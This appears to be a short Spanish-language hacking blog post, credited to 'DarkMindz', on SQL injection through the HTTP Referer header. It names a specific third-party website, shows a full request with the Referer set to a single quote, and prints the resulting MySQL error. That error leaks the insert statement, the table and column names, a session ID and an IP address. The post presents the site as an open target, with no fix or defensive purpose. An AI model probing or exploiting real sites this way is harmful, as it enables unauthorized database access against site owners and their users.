Sql Inyeccion en Headers

Muchas veces el referer es guardado dentro de una db sql permitiendo ser explotado en algunos casos.

http://www.xonic-solutions.de/conditions.php

este sitio guarda la sigueitne informacion:

customer_id, full_name, session_id, ip_address, time_entry, time_last_click, last_page_url, page_desc, referer_url

el header es:
Host: www.xonic-solutions.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept:

ext/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/ png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: '
Cookie: xploidID=wZIJaVN8VhWLpqhGJzVPIwE5xbXYlp9aasOZEEtHBmPw_H7l2rwIMR8aP8B-7i5A
Cache-Control: max-age=0


como se dieron cuenta el referer se cambio por '

y da el error:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

insert into user_tracking (customer_id, full_name, session_id, ip_address, time_entry, time_last_click, last_page_url, page_desc, referer_url) values ('', 'Guest', '57244m5u19oq8nh2huq1mfp37dknf42p', '83.233.168.232', '1211025037', '1211025037', '/cms_content.php?cID=2', 'HEADING_TITLE', ''')

un lugar para una inyexion :D

Fuente: DarkMindz

0 comentarios: